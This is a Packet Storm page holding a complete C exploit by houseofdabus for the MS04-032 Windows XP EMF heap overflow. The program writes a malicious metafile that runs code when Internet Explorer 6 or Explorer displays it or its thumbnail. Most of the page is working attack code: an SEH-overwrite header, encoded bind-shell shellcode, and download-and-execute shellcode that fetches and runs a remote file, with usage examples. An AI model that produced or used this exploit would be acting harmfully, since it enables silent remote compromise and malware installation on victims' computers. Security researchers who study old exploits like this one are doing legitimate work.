Exploit that creates crafted metadata files to exploit IE6.0 display of such, as well as Explorer.exe's display of thumbnails of such. Created by houseofdabus. Exploit will connect back to set host/port.
6ac76b6e9d4380e90bfffcd09ce79f5079255911a15b8ca1576478fc37cd8b08/* HOD-ms04032-emf-expl2.c:
*
* (MS04-032) Microsoft Windows XP Metafile (.emf) Heap
Overflow
*
* Exploit version 0.2 (PUBLIC) coded by
*
*
* .::[ houseofdabus ]::.
*
*
* [at inbox dot ru]
* -------------------------------------------------------------------
* About WMF/EMF:
* Windows Metafile (WMF) and Enhanced Windows
Metafile (EMF) formats
* are vector files that can contain a raster image...
*
* -------------------------------------------------------------------
* The vulnerability will be triggered by either viewing a
malicious
* file or by navigating to a directory, which contains a
malicious
* file and displays it as a thumbnail.
*
* Graphics Rendering Engine Vulnerability -
CAN-2004-0209
* -------------------------------------------------------------------
* Tested on:
* - Internet Explorer 6.0 (SP1) (iexplore.exe)
* - Explorer (explorer.exe)
* - Windows XP SP1
*
* -------------------------------------------------------------------
* Compile:
* Win32/VC++ : cl HOD-ms04032-emf-expl.c
* Win32/cygwin: gcc HOD-ms04032-emf-expl.c
-lws2_32.lib
* Linux : gcc -o HOD-ms04032-emf-expl
HOD-ms04032-emf-expl.c
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
* HOD.exe <file> <shellcode> <bind/connectback port>
[connectback IP]
*
* Shellcode:
* 1 - Portbind shellcode
* 2 - Connectback shellcode
*
* -------------------------------------------------------------------
* Examples:
*
* C:\>HOD-ms04032-emf-expl.exe expl.emf 1 7777
*
* C:\>HOD-ms04032-emf-expl.exe expl.emf 2
http://host/file.exe
*
* -------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for
educational
* purposes and testing by authorized individuals with
permission to
* do so.
*
*/
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#include <winsock2.h>
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif
#include <windows.h>
unsigned char emfheader[] =
"\x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00"
"\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00"
"\xEB\x12\x90\x90\x90\x90\x90\x90"
"\x9e\x5c\x05\x78" /* call [edi+0x74h] - rpcrt4.dll */
"\xb4\x73\xed\x77"; /* Top SEH - XP SP1 */
unsigned char portbind_sc[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff"
"\xff\xff\x8b\xc5\x83\xc0\x11\x33\xc9\x66\xb9\xc9\x01\x80\x30\x88"
"\x40\xe2\xfa\xdd\x03\x64\x03\x7c\x09\x64\x08\x88\x88\x88\x60\xc4"
"\x89\x88\x88\x01\xce\x74\x77\xfe\x74\xe0\x06\xc6\x86\x64\x60\xd9"
"\x89\x88\x88\x01\xce\x4e\xe0\xbb\xba\x88\x88\xe0\xff\xfb\xba\xd7"
"\xdc\x77\xde\x4e\x01\xce\x70\x77\xfe\x74\xe0\x25\x51\x8d\x46\x60"
"\xb8\x89\x88\x88\x01\xce\x5a\x77\xfe\x74\xe0\xfa\x76\x3b\x9e\x60"
"\xa8\x89\x88\x88\x01\xce\x46\x77\xfe\x74\xe0\x67\x46\x68\xe8\x60"
"\x98\x89\x88\x88\x01\xce\x42\x77\xfe\x70\xe0\x43\x65\x74\xb3\x60"
"\x88\x89\x88\x88\x01\xce\x7c\x77\xfe\x70\xe0\x51\x81\x7d\x25\x60"
"\x78\x88\x88\x88\x01\xce\x78\x77\xfe\x70\xe0\x2c\x92\xf8\x4f\x60"
"\x68\x88\x88\x88\x01\xce\x64\x77\xfe\x70\xe0\x2c\x25\xa6\x61\x60"
"\x58\x88\x88\x88\x01\xce\x60\x77\xfe\x70\xe0\x6d\xc1\x0e\xc1\x60"
"\x48\x88\x88\x88\x01\xce\x6a\x77\xfe\x70\xe0\x6f\xf1\x4e\xf1\x60"
"\x38\x88\x88\x88\x01\xce\x5e\xbb\x77\x09\x64\x7c\x89\x88\x88\xdc"
"\xe0\x89\x89\x88\x88\x77\xde\x7c\xd8\xd8\xd8\xd8\xc8\xd8\xc8\xd8"
"\x77\xde\x78\x03\x50\xdf\xdf\xe0\x8a\x88\xAB\x6F\x03\x44\xe2\x9e"
"\xd9\xdb\x77\xde\x64\xdf\xdb\x77\xde\x60\xbb\x77\xdf\xd9\xdb\x77"
"\xde\x6a\x03\x58\x01\xce\x36\xe0\xeb\xe5\xec\x88\x01\xee\x4a\x0b"
"\x4c\x24\x05\xb4\xac\xbb\x48\xbb\x41\x08\x49\x9d\x23\x6a\x75\x4e"
"\xcc\xac\x98\xcc\x76\xcc\xac\xb5\x01\xdc\xac\xc0\x01\xdc\xac\xc4"
"\x01\xdc\xac\xd8\x05\xcc\xac\x98\xdc\xd8\xd9\xd9\xd9\xc9\xd9\xc1"
"\xd9\xd9\x77\xfe\x4a\xd9\x77\xde\x46\x03\x44\xe2\x77\x77\xb9\x77"
"\xde\x5a\x03\x40\x77\xfe\x36\x77\xde\x5e\x63\x16\x77\xde\x9c\xde"
"\xec\x29\xb8\x88\x88\x88\x03\xc8\x84\x03\xf8\x94\x25\x03\xc8\x80"
"\xd6\x4a\x8c\x88\xdb\xdd\xde\xdf\x03\xe4\xac\x90\x03\xcd\xb4\x03"
"\xdc\x8d\xf0\x8b\x5d\x03\xc2\x90\x03\xd2\xa8\x8b\x55\x6b\xba\xc1"
"\x03\xbc\x03\x8b\x7d\xbb\x77\x74\xbb\x48\x24\xb2\x4c\xfc\x8f\x49"
"\x47\x85\x8b\x70\x63\x7a\xb3\xf4\xac\x9c\xfd\x69\x03\xd2\xac\x8b"
"\x55\xee\x03\x84\xc3\x03\xd2\x94\x8b\x55\x03\x8c\x03\x8b\x4d\x63"
"\x8a\xbb\x48\x03\x5d\xd7\xd6\xd5\xd3\x4a\x8c\x88";
unsigned char download_sc[]=
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17""HOD""\x21";
unsigned char endoffile[] = "\x00\x00\x00\x00";
void
usage(char *prog)
{
printf("Usage:\n");
printf("%s <file> <shellcode> <bindport / url>\n", prog);
printf("\nShellcode:\n");
printf(" 1 - Portbind shellcode\n");
printf(" 2 - Download & exec shellcode\n\n");
exit(0);
}
int
main(int argc, char **argv)
{
char endofurl = '\x01';
unsigned short port;
int sc;
FILE *fp;
printf("\n(MS04-032) Microsoft Windows XP Metafile
(.emf) Heap Overflow\n\n");
printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");
if (argc < 4) usage(argv[0]);
sc = atoi(argv[2]);
if ((sc > 2) || (sc < 1)) usage(argv[0]);
fp = fopen(argv[1], "wb");
if (fp == NULL) {
printf("[-] error: can\'t create file: %s\n", argv[1]);
exit(0);
}
/* header */
fwrite(emfheader, 1, sizeof(emfheader)-1, fp);
printf("[*] Shellcode: ");
if (sc == 1) {
port = atoi(argv[3]);
printf("Portbind, port = %u\n", port);
port = htons(port^(unsigned short)0x8888);
memcpy(portbind_sc+266, &port, 2);
fwrite(portbind_sc, 1, sizeof(portbind_sc)-1, fp);
fwrite(endoffile, 1, 4, fp);
}
else {
printf("Download & exec, url = %s\n", argv[3]);
fwrite(download_sc, 1, sizeof(download_sc)-1,
fp);
fwrite(argv[3], 1, strlen(argv[3]), fp);
fwrite(&endofurl, 1, 1, fp);
fwrite(endoffile, 1, 4, fp);
}
printf("[+] Ok\n");
fclose(fp);
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed